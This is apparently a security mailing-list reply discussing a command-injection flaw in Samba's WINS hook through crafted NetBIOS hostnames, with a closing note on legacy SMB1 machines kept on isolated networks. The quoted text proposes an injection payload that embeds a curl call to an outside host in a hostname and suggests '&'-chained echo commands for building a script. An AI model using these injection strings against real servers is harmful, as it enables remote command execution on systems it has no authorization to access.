On 10/15/25 20:39, Douglas Bagnall wrote: > On 16/10/25 12:30, Caveney, Seamus G wrote: > >> Illegal characters in a NetBIOS hostname are: >> >> \ / : * ? " < > | , >> >> notably excluding backticks and semicolons. I'm not deeply familiar >> with the Samba code base but a glance at nbtname.c and winsserver.c >> seems to suggest that those character limitations aren't enforced at >> the protocol level, so it might be possible to use pipes, redirects >> or exec a local binary with a short path. Otherwise, the easiest >> exploitable payload I can think of would be: >> >> ;`curl ab.cd`; > > The characters '<', ';', and '>' are blocked by the needs of the ldb > database that this server uses (I am not sure I checked '`', but it is > probably allowed). But of course '&' works just as well as ';'. > > If '>' worked, I think you could build up a script with a lot of > "&echo foo>>x&" followed by a `tr`. > >> I'd be interested to see if anybody has a living Samba install >> configured as a DC with WINS still running in 2025. > > Me too! > > The last indication of a 'wins hook' line I have seen was in 2016, and > that was commented out. > > An example of a place that may use it is a factory where some machinery > is a few decades old and only knows WINS but otherwise still works well. > > cheers, > Douglas
These machines also often use SMB1 to fetch files. Samba's SMB1 support avoids having to use an EOL Windows version. The security concerns of SMB1 are mitigated by using a dedicated network or VLAN and physical access controls. -- Sincerely, Demi Marie Obenour (she/her/hers)
OpenPGP_0xB288B55FFF9C22C1.asc
Description: OpenPGP public key
OpenPGP_signature.asc
Description: OpenPGP digital signature
